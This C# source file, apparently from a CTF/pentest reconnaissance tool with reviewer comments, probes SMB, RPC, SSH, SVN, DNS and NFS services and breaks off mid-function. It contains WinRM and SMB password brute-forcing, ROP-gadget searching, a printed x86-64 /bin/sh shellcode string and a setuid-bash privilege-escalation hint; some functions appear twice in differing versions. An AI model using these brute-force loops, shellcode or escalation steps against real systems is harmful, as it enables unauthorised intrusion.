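/// <summary>
/// Formats one account from an rpcclient "enumdomusers" listing and enriches it with
/// selected "queryuser" fields read over a null session (-U ""%"") against <paramref name="ip"/>.
/// </summary>
/// <param name="ip">Host passed to rpcclient.</param>
/// <param name="user">One enumdomusers output line, e.g. "user:[Guest] rid:[0x1f5]";
/// the account name is the text inside the first [...] group.</param>
/// <returns>"-- name" followed by "--- Field: value" lines for Full Name, Home Drive, Comment
/// and Description when non-empty, trimmed of surrounding newlines. Fields are collected until the
/// first rpcclient line without a ':' (the "padding1[0..7]..." / "logon_hrs[0..21].." tail).
/// A line with no [...] group is returned as a bare "-- line" bullet and is not queried
/// (previously this threw from Substring and would have handed an unparsed line to rpcclient).</returns>
private static string QueryEnumDomUser(string ip, string user)
{
    char[] newlineChars = Environment.NewLine.ToCharArray();

    // Account name = text between the first '[' and the ']' that follows it.
    int open = user.IndexOf("[");
    int close = open < 0 ? -1 : user.IndexOf("]", open + 1);
    if (open < 0 || close < 0)
    {
        return ("-- " + user.Trim()).Trim(newlineChars);
    }
    string userName = user.Substring(open + 1, close - open - 1);
    string returnInfo = "-- " + userName + Environment.NewLine;

    // userName is the remote host's own enumdomusers output and is placed unquoted inside the
    // rpcclient -c string; how GetProcessOutput tokenises its arguments is not visible here.
    List<string> infoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"queryuser {userName}\"");
    string[] wantedFields = { "Full Name", "Home Drive", "Comment", "Description" };
    foreach (string info in infoList)
    {
        int sep = info.IndexOf(":");
        if (sep < 0)
        {
            // End of the "key : value" section; the rest is padding / logon-hours dumps.
            break;
        }
        string description = info.Substring(0, sep).Trim();
        string value = info.Substring(sep + 1).Trim();
        if (Array.IndexOf(wantedFields, description) >= 0 && value != "")
        {
            returnInfo += "--- " + description + ": " + value + Environment.NewLine;
        }
    }
    // Both the early-stop and the full path now return trimmed text.
    return returnInfo.Trim(newlineChars);
}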
/// <summary>
/// Checks whether the SMB service on <paramref name="target"/> accepts a null session
/// (smbclient -L --no-pass) and, for each share it lists, whether an anonymous "ls" succeeds.
/// </summary>
/// <param name="target">Host (IP or name) passed to smbclient.</param>
/// <returns>One "- type: name (comment)" line per share, with an orange "-- ... has ls perms" line under
/// shares whose listing returned more than one line and no access-denied / not-found status; a single
/// status line for denied / disconnected / no-shares / timeout; a red error line when /usr/bin/smbclient
/// is missing. Surrounding newlines are trimmed.</returns>
private static string TestAnonymousAccess_Linux(string target)
{
    if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
    {
        string smbClientItems = "";
        // Null session (no user, no password). -g makes smbclient print "type|name|comment" rows.
        List<string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
        if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
        {
            return("- No Anonymous Access");
        }
        else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
        {
            return("- It connected, but instantly disconnected you");
        }
        else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
        {
            return("- Anonymous Access Allowed - But No Shares Found");
        }
        else if (processResults.Count >= 1 && processResults[0].Contains("NT_STATUS_IO_TIMEOUT"))
        {
            return("- Timed out :(");
        }
        foreach (string item in processResults)
        {
            // type|name|comment
            if (item.Trim() != "SMB1 disabled -- no workgroup available" && item.Trim() != "Anonymous login successful")
            {
                try
                {
                    // Any row without three '|'-separated fields throws IndexOutOfRangeException here
                    // and lands in the catch below.
                    string itemType = item.Split('|')[0];
                    string itemName = item.Split('|')[1];
                    string itemComment = item.Split('|')[2];
                    smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;
                    // itemName is server-supplied and goes unquoted into the next command line; how
                    // GetProcessOutput tokenises it is not visible here.
                    List<string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\"");
                    // "More than one line" is the only success signal; smbclient's own status lines are
                    // excluded by the two NT_STATUS checks.
                    if (subProcessResults.Count > 1 && !subProcessResults.Any(x => x.Contains("NT_STATUS_ACCESS_DENIED") || x.Contains("NT_STATUS_OBJECT_NAME_NOT_FOUND")))
                    {
                        smbClientItems += "-- " + $"{itemName} has ls perms - {subProcessResults.Count} items found! 
 -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine;
                    }
                }
                catch (Exception ex)
                {
                    if (ex.Message.Contains("NT_STATUS_IO_TIMEOUT"))
                    {
                        // NOTE: '=' rather than '+=' - shares collected before the timeout are dropped
                        // from the returned text.
                        smbClientItems = "-- Timeout - Try later :(" + Environment.NewLine;
                    }
                    else
                    {
                        Console.WriteLine($"TestAnonymousAccess_Linux - Error: {ex.Message} - Invalid item: {item} - Bug Reelix!");
                    }
                }
            }
        }
        return(smbClientItems.Trim(Environment.NewLine.ToCharArray()));
    }
    else
    {
        return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red));
    }
}
// Get Auth Methods
/// <summary>
/// Asks the SSH server on <paramref name="ip"/>:<paramref name="port"/> which authentication methods it
/// offers, by connecting with PreferredAuthentications=none and parsing the "Permission denied (...)"
/// line ssh prints back.
/// </summary>
/// <param name="ip">Target host; an empty value prints an error and returns "".</param>
/// <param name="port">SSH port passed as -p.</param>
/// <returns>The comma-separated method list with its parentheses stripped (e.g. "publickey,password"),
/// or a "- ..." status line for closed port / unknown kex / connection reset / timeout, or "" on
/// missing IP or unrecognised output (those cases also print to the console).</returns>
public static string GetAuthMethods(string ip, int port)
{
    string returnString = "";
    if (string.IsNullOrEmpty(ip))
    {
        Console.WriteLine("Error in ssh.GetAuthMethods - Missing IP");
        return("");
    }
    // StrictHostKeyChecking=no accepts whatever host key the peer presents, so this probe does not
    // verify the server's identity; it also adds the key to the local known_hosts.
    List<string> outputLines = General.GetProcessOutput("ssh", $"-o PreferredAuthentications=none -o StrictHostKeyChecking=no -o ConnectTimeout=5 {ip} -p {port}");
    // kex_exchange_identification: read: Connection reset by peer
    if (outputLines.Count == 1 && outputLines[0].EndsWith("Connection refused"))
    {
        return("- Port is closed");
    }
    if (outputLines.Count == 1 && outputLines[0].Contains("no matching key exchange method found. Their offer:"))
    {
        return("- Weird Auth Method: " + outputLines[0]);
    }
    if (outputLines.Count == 1 && outputLines[0].Trim() == "kex_exchange_identification: Connection closed by remote host")
    {
        return("- They have no auth methods to give you");
    }
    if (outputLines.Contains("kex_exchange_identification: read: Connection reset by peer"))
    {
        returnString = "- Port is open, but connection reset with no info :(";
        return(returnString);
    }
    if (!outputLines.Any(x => x.Contains("Permission denied")))
    {
        if ((outputLines.Count == 1 || outputLines.Count == 2) && outputLines[0].Contains("Connection timed out"))
        {
            return("Timed out :(");
        }
        else
        {
            Console.WriteLine("Error in ssh.GetAuthMethods - No Permission denied found");
            foreach (string line in outputLines)
            {
                Console.WriteLine($"Debug: --> {line}");
            }
            return("");
        }
    }
    returnString = outputLines.First(x => x.Contains("Permission denied"));
    // A "Permission denied" line without a '(' makes IndexOf return -1 and Remove throw
    // ArgumentOutOfRangeException; nothing here catches it.
    returnString = returnString.Remove(0, returnString.IndexOf("("));
    returnString = returnString.Replace("(", "").Replace(")", "");
    // ssh - oPreferredAuthentications = none - oStrictHostKeyChecking = no 10.10.10.147
    // [email protected]: Permission denied(publickey, password).
    // [email protected]: Permission denied (publickey,keyboard-interactive).
    // NOTE(review): the "[email protected]" prefixes in the samples above look like a redaction of
    // user@host in this copy of the file; the real prefix is not visible here.
    return(returnString);
}
/// <summary>
/// Runs a single rpcclient command against <paramref name="ip"/> and returns its output lines.
/// </summary>
/// <param name="ip">Host passed to rpcclient.</param>
/// <param name="command">Text placed inside the -c "..." argument. It is not escaped, so a command
/// containing a double quote breaks the argument string.</param>
/// <param name="signing">true: null session (-U ""%"") with default signing; false: user "anonymous"
/// with an empty password and signing disabled (-S off).</param>
/// <returns>Whatever General.GetProcessOutput returns for the rpcclient run.</returns>
private static List<string> RunCommand(string ip, string command, bool signing)
{
    string rpcArgs = signing
        ? $"-U \"\"%\"\" {ip} -c \"{command}\""
        : $"-S off -U \"anonymous\"%\"\" {ip} -c \"{command}\"";
    return General.GetProcessOutput("rpcclient", rpcArgs);
}
/// <summary>
/// Runs "svn log svn://ip" (Linux only) and summarises each commit as one bullet, including the
/// "svn diff -r(N-1)" command that shows that revision's change.
/// </summary>
/// <param name="ip">Host part of the svn:// URL.</param>
/// <returns>"- Commit rN by name - comment ( svn diff ... )" lines, or "- Conversion Error: ..." for a
/// commit block that could not be parsed, trimmed of surrounding newlines. "" when svn is missing or
/// the OS is not Linux (a message is printed in those cases).</returns>
public static string GetInfo(string ip)
{
    string toReturn = "";
    if (General.GetOS() == General.OS.Linux)
    {
        if (General.IsInstalledOnLinux("svn"))
        {
            // svn info svn://ip - Anything super useful?
            // The output lines are joined with '|' so that each commit block becomes one
            // '|'-separated record; svn's own header line ("rN | author | date | N lines") also uses '|'.
            string processOutput = string.Join("|", General.GetProcessOutput("svn", "log svn://" + ip));
            // svn log separates commits with a 72-dash line.
            List<string> commitList = processOutput.Split(new[] { "------------------------------------------------------------------------" }, StringSplitOptions.None).ToList();
            commitList.RemoveAll(string.IsNullOrEmpty);
            foreach (string commit in commitList)
            {
                List<string> splitItems = commit.Split('|').ToList();
                splitItems.RemoveAll(string.IsNullOrEmpty);
                // 0 - Revision
                // 1 - Name
                // 2 - Date
                // 3 - Lines (?)
                // 4 - Comment
                // Any IndexOutOfRange / FormatException from a block with fewer fields or a
                // non-numeric revision ends up as a "Conversion Error" bullet.
                try
                {
                    string commitRevision = splitItems[0].Trim();
                    int commitDiff = int.Parse(commitRevision.Replace("r", "")) - 1; // Indexes - How do they work!
                    string commitName = splitItems[1].Trim();
                    string commitDate = splitItems[2];   // unused
                    string commitLines = splitItems[3];  // unused
                    string commitComments = splitItems[4];
                    string commitInfo = "- Commit " + commitRevision + " by " + commitName + " - " + commitComments + " ( svn diff -r" + commitDiff + " svn://" + ip + " )";
                    toReturn += commitInfo + Environment.NewLine;
                }
                catch (Exception ex)
                {
                    toReturn += "- Conversion Error: " + ex.Message + Environment.NewLine;
                }
            }
            toReturn = toReturn.Trim(Environment.NewLine.ToCharArray());
        }
        else
        {
            // NOTE(review): the hint text says 'svn install subversion'; 'apt install subversion' is
            // presumably what was meant - confirm before changing the message.
            Console.WriteLine("svn is not installed - Skipping enumeration (You probably want to 'svn install subversion')");
        }
    }
    else
    {
        Console.WriteLine("svn.GetInfo currently lacks Windows support. Bug Reelix.");
    }
    return(toReturn);
}
/// <summary>
/// Lists the RPC programs registered on <paramref name="target"/> via "rpcinfo -p" (Linux only).
/// </summary>
/// <param name="target">Host passed to rpcinfo.</param>
/// <param name="port">Unused here.</param>
/// <returns>One "- line" bullet per rpcinfo output line, or a red error line when rpcinfo is not
/// installed; surrounding newlines are trimmed.</returns>
public static string GetInfo(string target, int port)
{
    char[] newlineChars = Environment.NewLine.ToCharArray();
    if (!General.IsInstalledOnLinux("rpcinfo"))
    {
        string missingTool = "- " + "Error: Cannot find rpcinfo - Unable to enumerate - install rpcbind".Pastel(Color.Red);
        return missingTool.Trim(newlineChars);
    }
    List<string> programLines = General.GetProcessOutput("rpcinfo", "-p " + target);
    string bullets = string.Concat(programLines.Select(line => "- " + line + Environment.NewLine));
    return bullets.Trim(newlineChars);
}
/// <summary>
/// Queries the DNS server at <paramref name="ip"/> for its "version.bind" CHAOS TXT record via nslookup.
/// Servers can be configured not to answer this (see the linked article).
/// </summary>
/// <param name="ip">DNS server to query.</param>
/// <param name="port">Unused here.</param>
/// <returns>"- No Info Available" when nslookup reports a timeout, otherwise one "- line" bullet per
/// nslookup output line; surrounding newlines are trimmed.</returns>
public static string GetInfo(string ip, int port)
{
    // https://raymii.org/s/tutorials/Get_DNS_server_version_and_hide_it_in_BIND.html
    List<string> answerLines = General.GetProcessOutput("nslookup", $"-type=txt -class=chaos version.bind {ip}");
    bool timedOut = answerLines.Count > 0 && answerLines[0].Trim() == "*** Request to UnKnown timed-out";
    string report = timedOut
        ? "- No Info Available"
        : string.Concat(answerLines.Select(line => $"- {line}" + Environment.NewLine));
    return report.Trim(Environment.NewLine.ToCharArray());
}
/// <summary>
/// Checks whether the SMB service on <paramref name="target"/> accepts a null session
/// (smbclient -L --no-pass) and, for each share it lists, whether an anonymous "ls" succeeds.
/// </summary>
/// <param name="target">Host (IP or name) passed to smbclient.</param>
/// <returns>One "- type: name (comment)" line per share, with an orange "-- ... has ls perms!" line under
/// shares whose listing returned more than one line; a single status line for denied / disconnected /
/// no-shares; a red error line when /usr/bin/smbclient is missing. Surrounding newlines are trimmed.</returns>
private static string TestAnonymousAccess_Linux(string target)
{
    if (!General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
    {
        return "- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red);
    }

    // Null session (no user, no password). -g makes smbclient print "type|name|comment" rows.
    List<string> shareLines = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g");
    bool singleLine = shareLines.Count == 1;
    if (singleLine && shareLines[0].Contains("NT_STATUS_ACCESS_DENIED"))
    {
        return "- No Anonymous Access";
    }
    if (singleLine && shareLines[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
    {
        return "- It connected, but instantly disconnected you";
    }
    if (shareLines.Count == 2
        && shareLines[0] == "Anonymous login successful"
        && shareLines[1] == "SMB1 disabled -- no workgroup available")
    {
        return "- Anonymous Access Allowed - But No Shares Found";
    }

    string report = "";
    foreach (string shareLine in shareLines)
    {
        if (shareLine.StartsWith("SMB1 disabled"))
        {
            continue;
        }
        // Rows that are not "type|name|comment" (status text such as "Anonymous login successful")
        // have fewer than three fields; the index below throws IndexOutOfRangeException and nothing
        // here catches it.
        string[] fields = shareLine.Split('|');
        string shareType = fields[0];
        string shareName = fields[1];
        string shareComment = fields[2];
        string commentSuffix = shareComment == "" ? "" : "(" + shareComment.Trim() + ")";
        report += "- " + shareType + ": " + shareName + " " + commentSuffix + Environment.NewLine;

        // shareName is server-supplied and goes unquoted into the next command line; how
        // GetProcessOutput tokenises it is not visible here.
        List<string> listing = General.GetProcessOutput("smbclient", $"//{target}/{shareName} --no-pass -c \"ls\"");
        if (listing.Count > 1)
        {
            report += "-- " + $"{shareName} has ls perms! -> smbclient //{target}/{shareName} --no-pass".Pastel(Color.Orange) + Environment.NewLine;
        }
    }
    return report.Trim(Environment.NewLine.ToCharArray());
}
/// <summary>
/// Tries every user/password pair from two wordlist files against WinRM on <paramref name="ip"/>
/// using PowerShell's Test-WSMan, printing "Success!" / "Failed" per pair. Requires an elevated
/// console because it widens the local WSMan client TrustedHosts list for the duration of the run.
/// </summary>
/// <param name="ip">Target host; written into WSMan:\localhost\Client\TrustedHosts.</param>
/// <param name="userFile">Path to a file with one user name per line (no existence check; File.ReadAllLines throws if missing).</param>
/// <param name="passFile">Path to a file with one password per line (same).</param>
private static void WinRMBrute_Windows(string ip, string userFile, string passFile)
{
    List<string> userList = File.ReadAllLines(userFile).ToList();
    List<string> passList = File.ReadAllLines(passFile).ToList();
    // Perms
    // Client-side trust change: TrustedHosts is reset at the end of the method, but not in a
    // finally block, so an exception inside the loops leaves the target trusted.
    List<string> permLines = General.GetProcessOutput("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + ip + " -Force");
    if (permLines.Count != 0)
    {
        if (permLines[0].Trim() == "Set-Item : Access is denied.")
        {
            Console.WriteLine("You need to run Reecon in an Administrative console for this functionality");
            return;
        }
    }
    foreach (string user in userList)
    {
        foreach (string pass in passList)
        {
            Console.Write("Testing " + user + ":" + pass + " - ");
            // The user and password are spliced into PowerShell source as '...' and "..." literals
            // without escaping, so a value containing a quote (or a $ in the password) changes the
            // script rather than the credential. Both values also appear on the powershell command line.
            List<string> processResult = General.GetProcessOutput("powershell", "$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ('" + user + "', (ConvertTo-SecureString \"" + pass + "\" -AsPlainText -Force)); Test-WSMan -ComputerName " + ip + " -Credential $creds -Authentication Negotiate -erroraction SilentlyContinue");
            // With -erroraction SilentlyContinue, any output at all is treated as success.
            if (processResult.Count != 0)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("Success!");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("Failed");
                Console.ForegroundColor = ConsoleColor.White;
            }
        }
    }
    // Restore the client TrustedHosts list (cleared, not restored to its previous value).
    General.RunProcess("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts '' -Force");
}
/// <summary>
/// Prints a static triage of a local ELF binary to the console: its architecture, a cyclic-input crash
/// probe read back from dmesg (x86 only), ropper gadget/string hits, the rabin2 "nx" flag, and objdump
/// call/symbol lines. Each external tool is skipped with a message when it is not installed.
/// </summary>
/// <param name="fileName">Path to the binary; must start with "./" or the method prints a message and returns.</param>
private static void ScanFile(string fileName)
{
    if (!fileName.StartsWith("./"))
    {
        Console.WriteLine("fileName must start with ./");
        return;
    }
    Architecture architecture = IDElf(fileName);
    if (architecture == Architecture.x86)
    {
        Console.WriteLine("Architecture: x86");
        // You can get a segfault address of x86 programs by going
        // dmesg | tail -2 (Sometimes the last entry isn't for it)
        // dmesg | grep "ret2win32" | tail -1
        // pwn cyclic 500
        // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
        // Pipes the pattern above into the binary through bash; fileName is inserted unquoted into the
        // bash -c string. The trailing 5 is RunProcess's extra argument (presumably a timeout in
        // seconds - confirm against General.RunProcess).
        General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
        List<string> dmesgOutput = General.GetProcessOutput("dmesg", "");
        foreach (string item in dmesgOutput)
        {
            // segfault at 6161616c ip 000000006161616c x
            // TrimStart strips any leading '.' and '/' characters. Every dmesg line that names this
            // file and mentions a segfault is printed, including older entries from earlier runs.
            if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
            {
                // 12 = length of "segfault at "; the next 9 characters are printed as-is (a shorter
                // line makes Substring throw).
                Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9));
            }
        }
    }
    else if (architecture == Architecture.x64)
    {
        Console.WriteLine("Architecture: x64");
        // TODO: Find where it segfaults, -1
    }
    else
    {
        Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
    }
    if (General.IsInstalledOnLinux("ropper"))
    {
        // ropper prefixes progress lines with [INFO] / [LOAD]; everything else is a "address: gadget" hit.
        List<string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
        foreach (string item in ropperOutput)
        {
            if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
            {
                string pwnItem = item.Trim();
                pwnItem = pwnItem.Replace(": ret;", "");
                // 18 characters = "0x" + 16 hex digits, i.e. a 64-bit address; the last 6 digits are echoed.
                if (pwnItem.Length == 18) // x64
                {
                    pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address
                }
                else
                {
                    Console.WriteLine("Not 18 - " + pwnItem.Length);
                }
                Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
            }
        }
        ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
        foreach (string item in ropperOutput)
        {
            if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
            {
                string pwnItem = item.Trim();; // the second ';' is an empty statement
                pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                if (pwnItem.Length == 18)
                {
                    pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address
                }
                else
                {
                    Console.WriteLine("Not 18 - " + pwnItem.Length);
                }
                Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
            }
        }
        ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
        foreach (string item in ropperOutput)
        {
            if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
            {
                string pwnItem = item.Trim();
                pwnItem = pwnItem.Replace("/bin/sh", "").Trim();; // the second ';' is an empty statement
                // 10 characters = "0x" + 8 hex digits here, yet the hint still uses p64 - see the
                // "Not 10" branch for anything else.
                if (pwnItem.Length == 10)
                {
                    pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address
                }
                else
                {
                    Console.WriteLine("Not 10 - " + pwnItem.Length);
                }
                Console.WriteLine("- /bin/sh --> " + pwnItem);
            }
        }
        //
        // ropper --file sudo_pwn_file_here --string "/bin/sh"
    }
    else
    {
        Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
    }
    if (General.IsInstalledOnLinux("rabin2"))
    {
        // fileName already starts with "./" (checked above), so rabin2 is given "././name"; the path
        // still resolves.
        List<string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
        foreach (string item in rabin2Output)
        {
            // rabin2 -I prints one "flag  value" line per binary property; only "nx" is inspected.
            if (item.Trim().StartsWith("nx") && item.Contains("false"))
            {
                Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                if (architecture == Architecture.x64)
                {
                    Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                }
                else
                {
                    // http://shell-storm.org/shellcode/
                    Console.WriteLine("Bug Reelix to fix his code!");
                }
            }
            else if (item.Trim().StartsWith("nx") && item.Contains("true"))
            {
                Console.WriteLine("- nx is enabled - No custom shellcode for you!");
            }
        }
    }
    else
    {
        Console.WriteLine("- rabin2 is not installed - Skipping nx check");
    }
    if (General.IsInstalledOnLinux("objdump"))
    {
        List<string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
        foreach (string item in objdumpOutput)
        {
            // Both substrings are matched independently, so any line containing "call" and "system"
            // anywhere (not only a call to system@plt) is reported.
            if (item.Contains("call") && item.Contains("system")) // callq contains call
            {
                Console.WriteLine("- system --> " + item);
            }
            if (item.Trim().EndsWith(" <puts@plt>:"))
            {
                Console.WriteLine("- puts@plt (plt_puts) --> " + item);
            }
            if (item.Contains("puts@GLIBC"))
            {
                Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
            }
        }
        objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
        foreach (string item in objdumpOutput)
        {
            // .text = Name
            // " g" = Global
            if (item.Contains(".text") && item.Contains(" g "))
            {
                Console.WriteLine("- Useful Symbol: " + item);
            }
        }
        // objdump -t ./file.elf | grep .text
    }
    else
    {
        Console.WriteLine("- objdump is not installed - Skipping syscalls");
    }
    Console.WriteLine("Finished");
}
/// <summary>
/// Lists the NFS exports of <paramref name="target"/> with showmount -e and highlights exports that are
/// open to everyone ("*" or " (everyone)"), adding a mount hint for each.
/// </summary>
/// <param name="target">Host passed to showmount.</param>
/// <param name="port">Unused here.</param>
/// <returns>Windows: "- Files:" plus one "-- line" per export and a mount hint (or a message that
/// showmount.exe is missing). Linux: one "- line" per export, with orange "--"/"---" hint lines under
/// world-readable ones, or a red error line when showmount is not installed. "" on other OSes.
/// Surrounding newlines are trimmed.</returns>
public static string GetInfo(string target, int port)
{
    // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse
    string fileList = "";
    if (General.GetOS() == General.OS.Windows)
    {
        if (File.Exists(@"C:\Windows\System32\showmount.exe"))
        {
            List<string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
            if (outputLines.Count > 1)
            {
                // First line is showmount's "Exports list on ..." header.
                outputLines.RemoveAt(0);
                fileList = "- Files:" + Environment.NewLine;
                foreach (string line in outputLines)
                {
                    fileList += "-- " + line + Environment.NewLine;
                }
                fileList = fileList.Trim(Environment.NewLine.ToCharArray());
                fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
            }
            fileList = fileList.Trim(Environment.NewLine.ToCharArray());
            return(fileList);
        }
        else
        {
            fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility";
            return(fileList);
        }
    }
    else if (General.GetOS() == General.OS.Linux)
    {
        if (General.IsInstalledOnLinux("showmount")) // "/sbin/showmount" OR "/usr/sbin/showmount"
        {
            List<string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
            foreach (string line in showmountOutput)
            {
                // https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
                // NFS V1
                if (line.Trim().EndsWith("*"))
                {
                    fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                    // TODO: this literal has no '$', so "{target}" is printed verbatim instead of the host
                    // (the NFS V2 branch below interpolates it correctly).
                    fileList += "-- NFSV1 -> " + "sudo mount -t nfs {target}:/mountNameHere /tmp/mount/ -nolock".Pastel(Color.Orange) + Environment.NewLine;
                    fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
                }
                // NFS V2
                else if (line.Contains(" (everyone)"))
                {
                    fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                    fileList += "-- NFSV2 -> " + $"sudo mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
                    fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, 
then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
                }
                else
                {
                    fileList += "- " + line + Environment.NewLine;
                }
            }
            return(fileList.Trim(Environment.NewLine.ToCharArray()));
            // The commented-out WMI code below is an unfinished Windows feature check; it is unreachable here.
            //
            // Windows
            //
            // ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2
            /*
             * ManagementClass objMC = new ManagementClass("Win32_OptionalFeature");
             * ManagementObjectCollection objMOC = objMC.GetInstances();
             * foreach (ManagementObject objMO in objMOC)
             * {
             * //Console.WriteLine("Woof!");
             * string featureName = (string)objMO.Properties["Name"].Value;
             * if (!featureName.ToUpper().Contains("NFS"))
             * {
             * continue;
             * }
             * uint installState = 0;
             * try
             * {
             * installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown
             * }
             * catch
             * {
             * Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value);
             * }
             *
             * //add to my list
             * Console.WriteLine("Installed: " + featureName + " -> " + installState);
             * }
             */
        }
        else
        {
            return("- Error - showmount is not installed - Unable to enumerate! Run: sudo apt install nfs-common".Pastel(Color.Red));
        }
    }
    else
    {
        // NOTE(review): "Supportd" is a typo in a runtime message; left as-is here.
        Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
    }
    return("");
}
/// <summary>
/// Tries every user/password pair from two wordlist files against the SMB service at args[1] using
/// "smbclient -L", printing one result line per pair and stopping at the first pair that is not
/// reported as a logon failure. Linux only.
/// </summary>
/// <param name="args">Exactly four entries: the "-smb-brute" switch, target IP, user file, password file
/// (see the usage message). Missing files are reported and the method returns.</param>
public static void SMBBrute(string[] args)
{
    // TODO: This still shows "Success" if:
    // - The username doesn't exist
    // - There is a space in the password
    if (!RuntimeInformation.IsOSPlatform(OSPlatform.Linux))
    {
        Console.WriteLine("SMB Brute only currently works in Linux - Heh :p");
        return;
    }
    if (args.Length != 4)
    {
        Console.WriteLine("SMB Brute Usage: reecon -smb-brute IP Userfile Passfile");
        return;
    }
    string ip = args[1];
    string userFile = args[2];
    string passFile = args[3];
    if (!File.Exists(userFile))
    {
        Console.WriteLine("Unable to find UserFile: " + userFile);
        return;
    }
    if (!File.Exists(passFile))
    {
        Console.WriteLine("Unable to find Passfile: " + passFile);
        return;
    }
    List<string> userList = File.ReadAllLines(userFile).ToList();
    List<string> passList = File.ReadAllLines(passFile).ToList();
    foreach (string user in userList)
    {
        foreach (string pass in passList)
        {
